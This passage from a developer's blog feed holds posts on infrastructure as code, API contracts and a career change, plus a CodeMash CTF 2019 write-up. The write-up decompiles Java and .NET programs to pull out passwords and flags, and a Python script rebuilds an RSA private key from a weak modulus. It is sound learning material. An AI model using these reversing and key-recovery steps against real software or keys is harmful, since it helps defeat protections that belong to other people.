exactly what we want an environment to look like, and have some tooling do all of the work to fulfill our contract. Bringing this close to home, think about the time and effort it takes to stand up a new N. It takes a lot of people and a lot of time to make sure everything is just right.</p><p>The holy grail for push button environments is that you do just that. You push a button, and after some time your environment will materialize before you. There shouldn't be any assumptions about where you want to stand up your environment. 
Everything required to get that infrastructure up and running should be contained within the contract.</p><h3 id="testability">Testability</h3><p>When we talk about testing, our minds most likely go to testing to make sure our applications work. We have an environment we want to deploy to, and we need to run our unit, integration, &lt;noun&gt; tests to make sure that our application will work when deployed. But where did that environment come from? How can we be sure the environment is correct?</p><p>Because Infrastructure as Code is.. code (it's right there in the name!), it gives us the ability to run tests against the infrastructure before it is actually applied. Some tests might verify that the docker daemon is installed and running or that some registry values exist. The key here is that we can now test the environment that our applications will be deployed to.</p><h2 id="what-does-any-of-this-have-to-do-with-drift">What does any of this have to do with drift?</h2><p>Glad you asked! One of the key takeaways about contracts and Infrastructure as Code is that you cannot be allowed to make any change to the environment without updating the contract. Doing so causes <em>drift</em>.</p><p>Environment drift occurs whenever someone changes the environment (applies a patch, adds some new registry value, etc.) without updating the contract. The whole point of all of this is that we know exactly what the environment looks like and can easily stand it up anywhere, because everything about the environment is outlined in a contract. If the environment differs from the contract, we lose those benefits. </p><p>When working with Infrastructure as Code, the same principles and processes we apply to deploying applications should also be applied to changes to our infrastructure. We don't just open up some source code on the production server, make a change, and apply it. 
The same rules and regulations should apply for our infrastructure.</p><p>If you want to make a change to the infrastructure, you must make a change to the contract and submit a pull request. If approved, that infrastructure will go through a series of tests, and will eventually be applied to the intended environment. How that change is applied could even mean we completely destroy the old environment and just stand up the result of the pull request.</p><p>Hooray immutability!</p><h1></h1><p></p>]]></content:encoded></item><item><title><![CDATA[Locked into a Contract? Lucky You!]]></title><description><![CDATA[<blockquote>Wait.. what? Contracts are horrible! I don't even know if I'm going to be using that service in the next few months, let alone years. I need <em><em>flexibility </em></em>so that as my requirements change I know I'm not going to be locked into something that no longer works for me.</blockquote>]]></description><link>https://reese.dev/locked-into-a-contract-lucky-you/</link><guid isPermaLink="false">5cdebce618b2660ace8d0dc3</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 17 May 2019 14:01:14 GMT</pubDate><content:encoded><![CDATA[<blockquote>Wait.. what? Contracts are horrible! I don't even know if I'm going to be using that service in the next few months, let alone years. I need <em><em>flexibility </em></em>so that as my requirements change I know I'm not going to be locked into something that no longer works for me.</blockquote><p>If you've ever had to sign a contract, you may be able to relate. They can be a pretty big deal. Both parties are explicitly agreeing to terms and conditions that cannot be violated, regardless of what may happen in the future. While contracts may feel like a burden in the real world, they are extremely powerful in software.</p><p>So what is a software contract? In practice, it doesn't differ that much from traditional contracts. 
It's an agreement between systems about what functionality is exposed, the data types of each message, the structure of the resource, etc. This allows us to forgo a lot of the manual validation that is typical when you're not exactly sure what's going to be sent on the wire or what the environment looks like.</p><h2 id="life-without-contracts">Life without Contracts</h2><p>Consider two independently deployed web services: PingService and PongService. When PingService sends a message to the PongService, the PongService should return a message, letting the PingService know the request was received.</p><p>Immediately we're in a state where there are more questions than answers. We know these services can talk over HTTP.. but that's about it.</p><ul><li>How do we structure the message to send to the PongService? Is it expecting JSON? XML?</li><li>What type of data should we send to the PongService? A Boolean? Integer?</li></ul><p>The answer that more than likely comes to mind is to.. look at the API documentation! Which, assuming it was kept up to date, should answer those questions for us.</p><p>OK, great, let's assume the documentation is up to date and accurate. We find out that it is indeed JSON and is expecting a string. Apparently the PongService just returns the string that was sent as its response.</p><p>So the next steps most likely involve creating some model to represent the result of calling the service, importing Newtonsoft.Json so we can do some JSON serialization and deserialization, and then ultimately POSTing to the endpoint (or was it a GET request?). After all of that is implemented, we finally validate whether or not both our request and response were formatted correctly.</p><p>Now that seems like a lot of work, manual work, to make a web request. The problem gets worse when you also consider that this process would need to be done for each and every service that wanted to interact with the PongService. 
That's a lot of code duplication scattered throughout the entire ecosystem that each team would need to manage.</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194264/wheresoda.gif" class="kg-image" alt="There HAS to be a better way!"></figure><div align="center">"There has to be a better way"</div><h2 id="and-there-is-with-contracts-">And there is.. with Contracts!</h2><p>Contracts and the tooling that supports them go a long way in solving the aforementioned problems. Let's take the same scenario as described above, but walk through it leveraging contracts. </p><p>The first thing we need to do is define the contract itself. This can be in any format: JSON, YAML, or in this case, <a href="https://cloudcity.plex.com/external-link.jspa?url=https%3A%2F%2Fdevelopers.google.com%2Fprotocol-buffers%2F" rel="nofollow">Protocol Buffers</a>. Generally, the format you decide on will be the one expected by the tooling and technologies you intend to leverage. The key takeaway here is that you define upfront how messages should be structured and the types of each.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/05/protodef.png" class="kg-image"></figure><p>This is a <strong>.proto</strong> file that explicitly defines how to interact with the PongService. <strong>The .proto file is the contract.</strong></p><p>Messages are sent to the service using a <em>PongRequest</em>, which has a message field, and then messages are received using a <em>PongResponse</em>, which also has a message field. There is one endpoint that the service exposes, <em>Get</em>.</p><p>Ok, so you might be thinking.. "Cool? Looks a lot like API documentation to me. 
I'll go start writing some code that structures messages this way."</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194267/pastedImage_28.png" class="kg-image"></figure><p>The beauty of leveraging contracts is that because there is an agreed-upon way to interact with the service, it's really easy to automatically generate all of the concerns we spoke about in the previous example.</p><p>From the contract, we can automatically generate the PongRequest and PongResponse objects; there is no need for a developer to ever create them. We can automatically generate a Client so that you can connect to the service easily. We can automatically generate fakes, stubs, and mocks for testing. Everything you need to interact with the service can be yours at the press of a few buttons.</p><p>This moves the validation and enforcement of the contract to the left, way earlier in the development lifecycle. Remember, in the previous example we didn't really know if things were going to work out until the very end. The code generated from the contract gives us compile-time confidence that the data is going to be sent and received a specific way.</p><p>We can even take this a step further, and from the same .proto file (contract), generate API documentation.</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194265/pongdoc.png" class="kg-image"></figure><p>The beauty of all of this is that if you were to change the contract, all of the resources that were generated above would be automatically regenerated during the CI/CD process. No more going into source code and updating client models or firing up some markdown editor to update your API documentation.</p><p>Contracts also make it a lot easier to manage versioning and assess the ramifications of changing the contract when things do inevitably need to change. 
We can be notified on our local machines if a change that we are introducing breaks the currently defined contract. There's no need to ask ourselves "Is this a breaking change?". We can let the contract validation handle that for us.</p><figure class="kg-image-card"><img src="https://cloudcity.plex.com/servlet/JiveServlet/downloadImage/38-5582-194268/versioningexample.png" class="kg-image"></figure><h2 id="summary-and-takeaways">Summary and Takeaways</h2><p>This is an incredibly large topic as it can be applied to almost anything. This post really just scratches the surface. Hopefully, however, it was enough to introduce the idea of contracts and the benefits they can bring when you have a single, unwavering source of truth that your ecosystem abides by.</p><p>Contracts enable the use of code generation with confidence. Why is that important?</p><ul><li>Code generation is your friend. There's no need to write your own client libraries in order to interact with a service.</li><li>Code generation is your friend. There's no need to write your own API documentation.</li><li>Code generation is your friend. There's no need to write your own testing stubs.</li></ul>]]></content:encoded></item><item><title><![CDATA[A Welcomed Change]]></title><description><![CDATA[<p>I've been a software developer for as long as I can remember. I still remember tinkering away on <a href="https://en.wikipedia.org/wiki/Netscape_Composer">Netscape Composer</a> building websites in the 2nd grade, which I suppose puts me around 7 years old at that time. It was fascinating! Every little puzzle you solved, every connection you made</p>]]></description><link>https://reese.dev/a-welcomed-change/</link><guid isPermaLink="false">5cdebedc18b2660ace8d0dc5</guid><category><![CDATA[work]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 26 Apr 2019 14:01:00 GMT</pubDate><content:encoded><![CDATA[<p>I've been a software developer for as long as I can remember. 
I still remember tinkering away on <a href="https://en.wikipedia.org/wiki/Netscape_Composer">Netscape Composer</a> building websites in the 2nd grade, which I suppose puts me around 7 years old at that time. It was fascinating! Every little puzzle you solved, every connection you made between the HTML tag and how it was represented on the screen, just made for an immersive and rewarding experience. I'll never forget how long it took me to fully grasp how linking to another static page worked. Days, my friends, days.</p><p>This fascination only increased over time. After building websites and learning HTML, I moved on to PHP, which opened up a whole other realm of possibilities for what I could put onto the Internet. I sold my first website in the 5th grade. It was just a little website for a band that listed some information, mostly dates and some background information, but also the ability to send an email to the group with a form.</p><p>I can't say for sure when I <em>knew </em>software development was going to be my career, but it could have been at that moment. It has just felt like I've always known. I've considered myself lucky in that regard. Always knowing what I was going to do in life.</p><p>Not surprisingly, I moved on to major in Computer Science, obtaining my Bachelor's at Michigan Technological University. One short month later, I began my career as a professional software developer.</p><p>I cannot adequately explain the excitement I had in the early days of my career. Up until then, my exposure to software development was just my own tinkerings and whatever my professors decided to assign me. I had no notion of what "production" meant, multiple web servers, databases, or deployment pipelines. I just used phpMyAdmin to create some databases and dropped my changes into my FTP client.</p><p>I think on my second day I was running into an issue where I couldn't find the source of the data that was displayed on a webpage. 
I was looking right at the database though. The name of the database was right, the table schema was right, but the rows just weren't there. Hours later, I came to find out that there's this thing where you have multiple identical databases that are hosted in different locations to address scalability concerns.</p><p>WHOA! Oh, OK, so I just need to change this connection string thing so I can connect to the database where the data I'm trying to see <em>actually</em> exists.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/05/mindblown.gif" class="kg-image"></figure><div align="center">"Mind... blown"</div><p>This was life as a developer for quite some time. Every day a new problem. Every day learning about a new solution.</p><p>As time went on, however, it got less exciting. There just came a time when I wanted to keep learning, progressing as a developer, but the work itself stayed the same. Company politics and arbitrary deadlines led to a road of bubble gum and duct tape. </p><p>For a long time, a really long time, I didn't feel like I was really making anything. I was just patching the system to keep it running, alone. Collaboration wasn't something that was necessarily seen as a strong need. You are given this task, and you should be able to complete it on your own. Communication just takes up time you could be programming.</p><p>Everything was expected to just work, without much regard for the part of coding I cared the most about: the craftsmanship. We were a feature factory.</p><p>Even though I was utterly disenchanted for quite some time, I stuck with it. My friends were here, the people were amazing, and the benefits weren't to be taken for granted. It was a strong culture.</p><p>To fill in the gaps left by work, I started blogging. I started going to every conference I could reasonably attend, and even spoke at some. I went on to get a Master's degree. 
Anything and everything I could think of to keep my passion in software alive. I figured this is how it had to be, unless I wanted to seek greener pastures elsewhere.</p><p>Luckily for me, an opportunity eventually came about. I was invited to join a team whose mission was to re-imagine how we develop at the company. We were to focus on all of the problems that plagued us as a company, and find solutions to them. But not just patch the existing system, and maybe make life slightly better, no. Throw out all restrictions, all previous decisions, and build something from nothing, the right way.</p><p>Reimagine how we set up our local environments, no more multiple day setups.</p><p>Reimagine how we develop our software, no more READMEs, use tooling.</p><p>Reimagine how we test our software, no more deploy to production and pray.</p><p>Reimagine the infrastructure our software runs on, no more distributed monolith.</p><p>I see it as a project born out of empathy. Most everyone at the company is painfully aware of the problems we face, but lack the time and power to fix anything in a meaningful way. We know what the problems are, we know the situation everyone is in, and it's a painful place to be in. Our true north is bettering the developer experience, and by proxy, bettering the company. If our actions do not reflect that, we've fallen down somewhere.</p><p>We've been working on this project for a little bit now, and I can't put into words how reinvigorating it is. Actions have meaning, collaboration is a first class citizen, and all of my teammates share my passion for development and doing it the right way. </p><p>It is indeed a welcomed change, and I am ecstatic about the future.</p><p></p>]]></content:encoded></item><item><title><![CDATA[CodeMash CTF 2019]]></title><description><![CDATA[<p>This past year <a href="http://www.codemash.org/">CodeMash</a> held their annual Capture the Flag competition. 
With the event wrapping up, I thought it would be a great learning opportunity for everyone if I described each of the challenges and explained the steps I took to solve each one. </p><p>There are <strong>fifteen </strong>in total</p>]]></description><link>https://reese.dev/codemash2019-ctf-solutions/</link><guid isPermaLink="false">5c2794cd04e4b332a4385dda</guid><category><![CDATA[ctf]]></category><category><![CDATA[conference]]></category><category><![CDATA[tutorial]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sat, 12 Jan 2019 19:26:18 GMT</pubDate><content:encoded><![CDATA[<p>This past year <a href="http://www.codemash.org/">CodeMash</a> held their annual Capture the Flag competition. With the event wrapping up, I thought it would be a great learning opportunity for everyone if I described each of the challenges and explained the steps I took to solve each one. </p><p>There are <strong>fifteen </strong>in total, so without further ado, let's begin!</p><ol>
<li><a href="#ascii-art">ASCII Art</a></li>
<li><a href="#busted-file">Busted File</a></li>
<li><a href="#esoteric-stuff">Esoteric Stuff</a></li>
<li><a href="#espresso">Espresso</a></li>
<li><a href="#krafty-kat">Krafty Kat</a></li>
<li><a href="#dot-nutcracker">Dot Nutcracker</a></li>
<li><a href="#capture-the-falg">Capture the Falg</a></li>
<li><a href="#ghost-text">Ghost Text</a></li>
<li><a href="#the-parrot">The Parrot</a></li>
<li><a href="#stacked-up">Stacked Up</a></li>
<li><a href="#unicorn">Unicorn</a></li>
<li><a href="#danger-zone">Danger Zone</a></li>
<li><a href="#mrs-robot">Mrs Robot</a></li>
<li><a href="#cars">Cars</a></li>
<li><a href="#on-site-challenge">On Site Challenge</a></li>
</ol>
<h2 id="ascii-art">ASCII Art</h2><p>The first challenge that was unlocked was some ASCII art that spelled out "CODE MASH". It also included this sentence: <strong>I love ASCII art. What about you?</strong></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/02/code_mash_ascii.png" class="kg-image"></figure><p>Though if you notice, the word CODE has some numbers scattered throughout. </p><p>The problem seems to be hinting pretty hard that it relates to ASCII and ASCII codes. So I took each number in the word CODE, assumed it was an ASCII code, and translated it to a character.</p><pre><code>cm19-asci-CODE-a1nt-H4RD
</code></pre>
<p>Well, that looks like a flag to me!</p><h2 id="busted-file">Busted File</h2><p>We are given a zip file (busted.zip) that contains a single image (image.png). Though when I tried to extract the image, I got an error saying that the archive is corrupt.</p><p>Upon trying to repair the archive using WinRAR, I was given an error about a <strong>Corrupt header</strong>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge2_photo3.png" class="kg-image"></figure><p>I had no idea what a zip header should look like, so I created my own zip file and opened it up into a hex editor.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge2_photo2.png" class="kg-image"></figure><p>You can see here that the newly created (and valid) header contains: </p><pre><code>50 4B 03 04 14 00 02 00 08
</code></pre>
<p>Opening the corrupt file, you'll notice that the header contains: </p><pre><code>DE AD BE EF 14 00 00 00 08
</code></pre>
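<p>The same repair can also be scripted instead of being done by hand in a hex editor. Here is a small, purely illustrative sketch in Go that patches the bogus bytes shown above (it operates on an in-memory slice; the real fix would read and rewrite the archive file):</p><pre><code class="language-go">package main

import (
	"bytes"
	"fmt"
)

// patchZipHeader swaps the bogus DE AD BE EF bytes for the standard
// ZIP local file header signature, 50 4B 03 04 ("PK\x03\x04").
func patchZipHeader(data []byte) []byte {
	if bytes.HasPrefix(data, []byte{0xDE, 0xAD, 0xBE, 0xEF}) {
		copy(data[:4], []byte{0x50, 0x4B, 0x03, 0x04})
	}
	return data
}

func main() {
	// The first nine bytes of the corrupt archive, as seen in the hex editor.
	corrupt := []byte{0xDE, 0xAD, 0xBE, 0xEF, 0x14, 0x00, 0x00, 0x00, 0x08}
	fmt.Printf("% X\n", patchZipHeader(corrupt))
}
</code></pre>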
<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge2_photo1.png" class="kg-image"></figure><p>Using the hex editor to replace the corrupted header with the expected header allowed me to successfully unzip the file.</p><p>The contents of the zip file contained the following image:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/image.jpg" class="kg-image"></figure><p>This approach of hiding text within an image is called <em>steganography. </em>There are a couple ways that this could have been done.</p><ol><li>The flag could be rendered into the image itself. Typical methods of extraction could be to invert the colors, adjust the hue and saturation, etc. Play with the layers and colors to see if the original author put the text into the image itself.</li><li>Another approach, and the actual solution to this challenge, is to embed the text into the actual file. If you open up this image with Notepad or a hex editor, towards the beginning of the file you'll see the flag in plain text.</li></ol><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/image-1.png" class="kg-image"></figure><h2 id="esoteric-stuff">Esoteric Stuff</h2><p>The third challenge contained a large block of periods, exclamation points, and question marks.</p><pre><code>....................!?.?...?....
...?...............?............
........?.?.?.?.!!?!.?.?.?.?!!!.
....................!.?.?.......
................................
!.................!.!!!!!!!!!!!!
!!!!!!!!!!!!!..?.?!!!!!!!!!!!!!!
!!!.............................
!.?.?.......!..?.?!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!.?.?.!!!!!!!.
.?.?........................!.!!
!!!!!!!!!!!!!!!!!!!!!...!.?.....
..!.?.!..?.?....................
........!.!!!!!!!!!!!!!!!!!!!!!!
!!!!!...........................
....!.?...........!.?.!..?.?!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!.?.?.......!..?.?..!...!.?.?.!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.</code></pre><p>It also included this sentence: It's getting a bit esoteric now. <strong>Ook</strong>ay?!</p><p>Note the bolded text.</p><p>If you're unfamiliar with the term <em>esoteric</em>, it means that something is understood by only a small set of individuals. In the world of programming, it refers to <a href="https://en.wikipedia.org/wiki/Esoteric_programming_language">esoteric programming languages</a>. These languages are typically just meant for fun and really aren't intended for production use. My go-to example of an esoteric language is <a href="https://lolcode.org/">LOLCODE</a>.</p><p>I also noticed that the <em>Ook</em> in <em>Ookay</em> was bolded. I concluded that <a href="https://esolangs.org/wiki/ook!">Ook</a> must be another esoteric programming language and that the given text was source code written in Ook.</p><p>I used an <a href="https://www.dcode.fr/ook-language">Ook interpreter</a> to retrieve the flag, and.. success!</p><h2 id="espresso">Espresso</h2><p>This challenge only provided a single file, <code>Espresso.class</code>.</p><p>Luckily, class files are something that you can decompile pretty easily, so my first step was to run the class file through a <a href="http://www.javadecompilers.com/">Java decompiler</a>, which resulted in the following source:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge4_photo2.png" class="kg-image"></figure><p>Looking at the source of the class file, I saw that there is a conditional that checks whether the user's input is equal to <code>localStringBuffer</code>. If it matches, the program will print out: <strong>Flag correct, well done!</strong></p><p>That seems like a pretty good starting point, right?</p><p><code>localStringBuffer</code> is a private variable that is defined and then built up in a for loop. 
After the for loop completes, the variable doesn't change and should theoretically contain the flag.</p><p>To get what <code>localStringBuffer</code> would be after running the for loop, I just went ahead and removed all of the extra code and just focused on getting <code>localStringBuffer</code> to be built.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/12/challenge4_photo1.png" class="kg-image"></figure><p>Running this slimmed down version of Espresso.class yields the flag.</p><h2 id="krafty-kat">Krafty Kat</h2><p>RSA encryption.. my dear old friend. This was the first challenge with a difficulty of "hard", and honestly took a decent bit longer than the other ones to crack.</p><p>This challenge has a <code>flag.enc</code> file and a <code>key.pem</code> file. The flag is obviously in the <code>flag.enc</code> file, and is encrypted. I knew I needed to use the provided public key in order to gain access to the encrypted file. The public key looked like this:</p><pre><code>-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEIAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEcwIDAQAB
-----END PUBLIC KEY-----
</code></pre>
<p>Now, how RSA encryption works could be a post all in itself, so I'll just go over each step and describe whats happening.</p><p>The above public key is a base64 encoded string that contains what is called the <em>Modulus </em>in RSA. We can use <em>openssl </em>to extract this result like so:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-2.png" class="kg-image"></figure><p>Here we can see the <strong>Modulus </strong>and the <strong>Exponent </strong>(65537). Now, the Modulus is currently in hex, but I need to get this number as an integer. </p><p>The first step to do this is to strip away all of the colons</p><pre><code>800000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000473
</code></pre>
<p>The next step is to convert this into an integer. I used python to cast it, but the method doesn't really matter.</p><pre><code>258536048570605626988915097172641057803353415992887757589736645808726151727194085610744190012322229640908553929414833022731988789391928353742297595957524280335918484224592037842886381777837922164216258913020883767452162759055614423529478656392491416399318604362756647059576165428708885769576577464120568116338612287783043168328279883802253392551292712278925133675758884573430117126518137049529478694956180472120065649305066144792948879520988172974401270565515875720597321219813209954571652637983550511681618170361995093036165713586725018263017699754932627926751512891645482818654590419836934782173099306176053375927411
</code></pre>
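<p>Both steps, stripping the colons and casting to an integer, fit in one line of Python. The modulus below is a shortened, hypothetical stand-in; in practice you'd paste in the full hex string from openssl:</p>

```python
# Convert openssl's colon-separated hex modulus into a Python integer.
# This modulus is a shortened, hypothetical example, not the real one.
modulus_hex = "80:00:00:00:00:40:00:00"
n = int(modulus_hex.replace(":", ""), 16)
print(n)  # 9223372036858970112
```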
<p>When working with RSA, a really important formula is <code>n = p * q</code>. The number above (the really big one) is my <code>n</code> value, and it is the product of two prime numbers, <code>p</code> and <code>q</code>. If you know <code>p</code> and <code>q</code>, you can derive the private key.</p><p>However, these prime numbers are kept secret and should not be known. It is possible to figure out what they are, though, if the RSA was implemented poorly (e.g. bad primes were chosen).</p><p>So if <code>n</code> is the product of <code>p</code> and <code>q</code>, and both <code>p</code> and <code>q</code> must be prime, how do we figure out what they could possibly be? Brute force is one option, but it would take.. a long time. Too much time.</p><p>The alternative is to see if any factors of <code>n</code> are already known. I did this through a website called <a href="http://factordb.com">factordb</a>. I plugged in the <code>n</code> value I calculated above and noticed that there are no factors.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-3.png" class="kg-image"></figure><p>Well.. if <code>n = p * q</code>, and <code>p</code> and <code>q</code> must be prime.. but <code>n</code> has no factors.. then <code>n</code> itself is prime, so <code>p</code> must be equal to <code>n</code> and <code>q</code> must be equal to <code>1</code>.</p><p>At this point we know <code>p</code>, <code>q</code>, <code>e</code>, and <code>n</code>. The last value we need is <code>d</code>, the decryption exponent. Honestly, at this point <code>d</code> can just be calculated from all of our other values, so I wrote a script in Python to do just that.</p><pre><code class="language-python">from Crypto.PublicKey import RSA
import gmpy2

#open the provided key file
pub = open(&quot;key.pem&quot;, &quot;r&quot;).read()
pub = RSA.importKey(pub)

#set the values of n and e from the key file
n = int(pub.n)
e = int(pub.e)

#n has no nontrivial factors (n is prime), so p = n and q = 1
p = 258536048570605626988915097172641057803353415992887757589736645808726151727194085610744190012322229640908553929414833022731988789391928353742297595957524280335918484224592037842886381777837922164216258913020883767452162759055614423529478656392491416399318604362756647059576165428708885769576577464120568116338612287783043168328279883802253392551292712278925133675758884573430117126518137049529478694956180472120065649305066144792948879520988172974401270565515875720597321219813209954571652637983550511681618170361995093036165713586725018263017699754932627926751512891645482818654590419836934782173099306176053375927411
q = 1

#calculate d; since n is prime, phi(n) = n - 1
d = int(gmpy2.invert(e, n - 1))

#use d to construct the private key and decrypt the flag
key = RSA.construct((n, e, d))
message = key.decrypt(open('flag.enc', 'rb').read())

print(message)
</code></pre>
<p>This will print the contents of <code>flag.enc</code>, which contains the flag itself!</p><h2 id="dot-nutcracker">Dot Nutcracker</h2><p>In this challenge, there was an executable file that gave you three attempts to type in a password. If you got the password correct, the program would output the flag. </p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-1.png" class="kg-image"></figure><p>Now obviously, the three attempts were just fluff, as you could just start the program again. Regardless, the password (and the flag) have to be inside of the executable somewhere.</p><p>To get at the source code of the application, I used a decompiler called <a href="https://www.jetbrains.com/decompiler/">dotPeek</a>, which allowed me to view the source of the executable. I even took it a step further and exported the source to a new project. This allowed me to make modifications to the program itself, as well as do any sort of debugging.</p><p>Reading through the source code, I came across the primary <code>if</code> check that compared the user's input with the stored password.</p><pre><code class="language-csharp">      while (num &gt; 0)
      {
        Console.WriteLine(string.Format(&quot;You have {0}/3 attempt(s) left.&quot;, (object) num));
        Console.Write(&quot;Enter passphrase: &quot;);
        string str1 = Console.ReadLine();
        string str2 = CryptoHelper.DecryptStringAES(&quot;EAAAAH5ZA4kASLVjLUsYmLK3h74KWmkS4BvBS61BuaD4lnyqdz3AO8/xfGO1atVdci0x1g==&quot;);
        if (str1 != null &amp;&amp; cryptoHelper.Equals(str2, str1))
        {
          Console.WriteLine(string.Format(&quot;Decrypted Flag is: {0}&quot;, (object) CryptoHelper.DecryptStringAES(&quot;EAAAAOlDKPcRaUj/ITV1q9IHN1bAQyUWxZqVob+G1gpmyoIJIPej1O3T4TWnRUndqp4NnA==&quot;, CryptoHelper.GetHashString(str2), str1, str1)));
          Console.WriteLine(&quot;Press enter to quit&quot;);
          Console.ReadLine();
          Environment.Exit(1337);
        }
        --num;
        Console.WriteLine(&quot;That's wrong.&quot;);
      }
</code></pre>
<p>Reading the code above, it looks like <code>str2</code> contains the password. I did a <code>Console.WriteLine</code> of <code>str2</code> and saw that <em>acrackeradaykeepsthedoctoraway</em> is printed out. Success! Found the password.</p><p>However, when attempting to use the password, the program crashes with the following message:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image.png" class="kg-image"></figure><p>I went through the source code some more and noticed that the original <code>if</code> statement that compares the passwords is actually using <code>CryptoHelper</code>'s <code>Equals</code> method, which has the following implementation:</p><pre><code class="language-csharp">public bool Equals(string a, string b)
{
  if (!b.Equals(a))
    return a.Equals(b + &quot;y&quot;);
  return true;
}
</code></pre>
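<p>To sanity-check what this comparison actually accepts, here is a hypothetical Python model of the same logic:</p>

```python
# Hypothetical Python model of the decompiled Equals method: the stored
# passphrase also matches input that is missing one trailing "y".
def quirky_equals(stored: str, entered: str) -> bool:
    if stored != entered:
        return stored == entered + "y"
    return True

print(quirky_equals("acrackeradaykeepsthedoctoraway", "acrackeradaykeepsthedoctorawa"))  # True
```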
<p>This means that both <code>acrackeradaykeepsthedoctoraway</code> and <code>acrackeradaykeepsthedoctorawa</code> should be accepted as correct passwords. Well, if the former causes the application to crash, maybe the latter won't.</p><p>It did not!</p><h2 id="capture-the-falg">Capture the Falg</h2><p>This challenge had the following text:</p><pre><code>This falg is easy to catch, isn't it?
criSdmetio1AUdW9dP3n----
</code></pre>
<p>and gave this picture:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/capturethefalg.jpg" class="kg-image"></figure><p>If you notice, the name of the challenge is Capture the Falg and not Flag. The <code>a</code> and <code>l</code> are jumbled up. The image is jumbled up in the same way. Another interesting observation is that the word falg has 4 letters, and there are also 4 boxes, one for each piece of the flag.</p><p>To render the image correctly, you'd keep the 1st piece where it is, follow it with the piece directly below it, then the top-right piece, and leave the last piece where it is.</p><p>Applying this same approach to the word <code>falg</code>, you would get the following:</p><pre><code>fa
lg
</code></pre>
<p>To read the word <code>flag</code> you need to start from the top left, move down, and then go back to the top in the next column.</p><p>Now, if we were to apply this same pattern to the string that we were given (presumably the flag itself), we get the following:</p><pre><code>criSd
metio
lAUdW
9dP3n
----
</code></pre>
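<p>This column-by-column read is easy to script. A small sketch, using the grid exactly as transcribed above:</p>

```python
# Read the block column by column, top to bottom, left to right --
# the same transformation that turns "fa" / "lg" back into "flag".
rows = ["criSd", "metio", "lAUdW", "9dP3n", "----"]
width = max(len(row) for row in rows)
text = "".join(row[col] for col in range(width) for row in rows if col < len(row))
print(text)
```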
<p>Reading the text just like before will render the flag.</p><h2 id="ghost-text">Ghost Text</h2><p>For this challenge the description was:</p><pre><code>Ghost text is ... invisible!
</code></pre>
<p>The challenge also provided a text file with this text:</p><pre><code>​In​ ​folk​l​or​e​, ​a​ g​hos​t​ is ​the​ ​s​oul​ or​ s​p​ir​it​ ​o​f a​ dea​d​ pe​r​son​ ​or​ ani​m​al ​that ​ca​n​ a​pp​e​ar t​o t​h​e​ l​ivin​g​.​ I​n​ ​gh​o​st​l​o​re, ​gh​o​st​ d​e​s​cr​ipti​o​ns​ vary​ ​wid​el​y,​ from​ ​inv​is​i​bl​e ​pre​sence​s to l​if​el​ike​ vi​si​ons​.
</code></pre>
